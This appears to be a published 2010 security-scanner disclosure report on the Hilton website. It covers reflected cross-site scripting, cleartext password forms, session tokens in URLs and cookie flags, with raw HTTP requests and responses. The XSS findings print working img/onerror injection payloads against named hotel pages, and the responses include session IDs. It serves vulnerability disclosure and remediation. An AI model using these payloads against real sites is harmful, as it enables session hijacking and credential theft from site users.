Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Report generated by Hoyt LLC Research at Wed Oct 06 09:51:00 EDT 2010.


Cross Site Scripting Report for www1.hilton.com | Hoyt LLC Research


Contents

Loading

1. Cross-site scripting (reflected)

1.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do [REST URL parameter 4]

1.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do [REST URL parameter 4]

2. Cleartext submission of password

2.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

2.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

3. Session token in URL

3.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

3.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

4. Cookie without HttpOnly flag set

4.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

4.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

5. Password field with autocomplete enabled

5.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

5.2. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

5.3. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

5.4. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

6. Cross-domain Referer leakage

6.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

6.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

7. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do [REST URL parameter 4]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c2e"><img%20src%3da%20onerror%3dalert(1)>ac60a8e7089 was submitted in the REST URL parameter 4. This input was echoed as e7c2e"><img src=a onerror=alert(1)>ac60a8e7089 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texase7c2e"><img%20src%3da%20onerror%3dalert(1)>ac60a8e7089/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:49:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=BEDDD467A358F67878185B13FCB918E1.etc84; Path=/
Set-Cookie: NSC_qse-qgt=44153db63660;expires=Wed, 06-Oct-10 14:00:56 GMT;path=/
Content-Length: 82678


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
<a href="/es/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texase7c2e"><img src=a onerror=alert(1)>ac60a8e7089/index.do" class="languageLink">
...[SNIP]...

1.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57702"><img%20src%3da%20onerror%3dalert(1)>83da54ce4d8 was submitted in the REST URL parameter 4. This input was echoed as 57702"><img src=a onerror=alert(1)>83da54ce4d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California57702"><img%20src%3da%20onerror%3dalert(1)>83da54ce4d8/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:49:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=6CE52DA8628C9A40D55ABCCFE942BBE4.etc74; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 14:00:39 GMT;path=/
Content-Length: 87035


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
<a href="/es/hi/hotel/LAXBHHH-The-Beverly-Hilton-California57702"><img src=a onerror=alert(1)>83da54ce4d8/index.do" class="languageLink">
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=3AC3AB2062A3278A46A8C0D50BAAD192.etc54; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:59:12 GMT;path=/
Content-Length: 82606


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
</div>
           
           
               <form name="frmSignin" action="/doxch.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54?dst=https://HI/en/hi/PFSLogin" method="post">
           
<input type="hidden" name="prevPageTitle" value="">
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

2.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=70D3061EF6F7EDC48B7A613930610779.etc24; Path=/
Set-Cookie: NSC_qse-qgt=44153d5e3660;expires=Wed, 06-Oct-10 13:58:44 GMT;path=/
Content-Length: 86860


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
</div>
           
           
               <form name="frmSignin" action="/doxch.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24?dst=https://HI/en/hi/PFSLogin" method="post">
           
<input type="hidden" name="prevPageTitle" value="">
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

3. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=3AC3AB2062A3278A46A8C0D50BAAD192.etc54; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:59:12 GMT;path=/
Content-Length: 82606


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
<td>
           
               
                                                                                                               <a href="/en_US/hi/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54" title="Hilton Hotels Home Page" tabindex="3">
                           <img src="/en_US/hi/media/images/logos/logo.gif" border="0" />
...[SNIP]...
<li id="hotel_primary_nav_home" class="selected primaryHotelNavFirst "><a href="index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Home</a>
...[SNIP]...
<li id="hotel_primary_nav_accommodations" class=""><a href="accommodations.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Accommodations</a>
...[SNIP]...
<li id="hotel_primary_nav_services_amenities" class=""><a href="services.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Services &amp; Amenities</a>
...[SNIP]...
<li id="hotel_primary_nav_dining" class=""><a href="dining.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Dining</a>
...[SNIP]...
<li id="hotel_primary_nav_local_guide" class=""><a href="localguide.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Local Guide</a>
...[SNIP]...
<div class="rightHeader">
<a href="accommodations.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">More Accommodations</a>
...[SNIP]...
<div class="rightHeader">
       <a href="directions.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54#localmap">View Maps</a>
...[SNIP]...
<p>
   2.5 miles north of DFW International Airport. Take 121N exit from the airport, exit Bass Pro, turn left heading over the overpass and right on Hwy 26. The hotel is the first turn in on the left. <a href="directions.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">View all directions, map, and airport information</a>
...[SNIP]...
<div id="parking">
<a href="directions.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54#parking">Parking</a>
...[SNIP]...
<div class="label">
   
   
                                           <a href="services.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54#policies">Pets</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');" href="/en/ch/home.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');" href="/en_US/hi/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');" href="/en_US/dt/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');" href="/en_US/es/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');" href="/en_US/gi/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');" href="/en_US/hp/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');" href="/en_US/hw/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');" href="/en_US/ht/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="/en_US/hh/home_index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54"><span>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="/en_US/hi/customersupport/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">
                                                       Customer Support
                                                   </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/ww/customersupport/privacy-policy.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54" rel="nofollow">
                               Privacy Policy (updated July 2007)
                           </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/hi/customersupport/site-usage.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54" rel="nofollow">
                               Site Usage Agreement
                           </a>
...[SNIP]...
<li><a href="/es/hi/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Espa..ol</a>
...[SNIP]...
<li><a href="/fr/hi/index.do;jsessionid=3AC3AB2062A3278A46A8C0D50BAAD192.etc54">Fran..ais</a>
...[SNIP]...

3.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=70D3061EF6F7EDC48B7A613930610779.etc24; Path=/
Set-Cookie: NSC_qse-qgt=44153d5e3660;expires=Wed, 06-Oct-10 13:58:44 GMT;path=/
Content-Length: 86860


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...
<td>
           
               
                                                                                                               <a href="/en_US/hi/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24" title="Hilton Hotels Home Page" tabindex="3">
                           <img src="/en_US/hi/media/images/logos/logo.gif" border="0" />
...[SNIP]...
<li id="hotel_primary_nav_home" class="selected primaryHotelNavFirst "><a href="index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Home</a>
...[SNIP]...
<li id="hotel_primary_nav_accommodations" class=""><a href="accommodations.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Accommodations</a>
...[SNIP]...
<li id="hotel_primary_nav_services_amenities" class=""><a href="services.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Services &amp; Amenities</a>
...[SNIP]...
<li id="hotel_primary_nav_dining" class=""><a href="dining.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Dining</a>
...[SNIP]...
<li id="hotel_primary_nav_local_guide" class=""><a href="localguide.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Local Guide</a>
...[SNIP]...
<div class="rightHeader">
<a href="accommodations.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">More Accommodations</a>
...[SNIP]...
<div class="rightHeader">
       <a href="directions.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24#localmap">View Maps</a>
...[SNIP]...
<p />FROM EAST: 10 West to Robertson Boulevard Exit. Go right on Robertson to Wilshire Boulevard. Take Wilshire Blvd West approximately 1 mile.... <a href="directions.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">View all directions, map, and airport information</a>
...[SNIP]...
<div id="parking">
<a href="directions.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24#parking">Parking</a>
...[SNIP]...
<div class="label">
   
   
                                           <a href="services.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24#policies">Pets</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');" href="/en/ch/home.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');" href="/en_US/hi/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');" href="/en_US/dt/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');" href="/en_US/es/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');" href="/en_US/gi/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');" href="/en_US/hp/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');" href="/en_US/hw/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');" href="/en_US/ht/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="/en_US/hh/home_index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24"><span>
...[SNIP]...
<li>
                                                   
                                                   
                                                                                                       <a href="/en_US/hi/customersupport/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">
                                                       Customer Support
                                                   </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/ww/customersupport/privacy-policy.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24" rel="nofollow">
                               Privacy Policy (updated July 2007)
                           </a>
...[SNIP]...
<li>
                           
                           
                                                       <a href="/en_US/hi/customersupport/site-usage.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24" rel="nofollow">
                               Site Usage Agreement
                           </a>
...[SNIP]...
<li><a href="/es/hi/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Espa..ol</a>
...[SNIP]...
<li><a href="/fr/hi/index.do;jsessionid=70D3061EF6F7EDC48B7A613930610779.etc24">Fran..ais</a>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:48:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=3AC3AB2062A3278A46A8C0D50BAAD192.etc54; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Wed, 06-Oct-10 13:59:12 GMT;path=/
Content-Length: 82606


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...

4.2. http://www1.hilton.com/en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en_US/hi/hotel/LAXBHHH-The-Beverly-Hilton-California/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Wed, 06 Oct 2010 13:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=70D3061EF6F7EDC48B7A613930610779.etc24; Path=/
Set-Cookie: NSC_qse-qgt=44153d5e3660;expires=Wed, 06-Oct-10 13:58:44 GMT;path=/
Content-Length: 86860


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
   <meta http
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

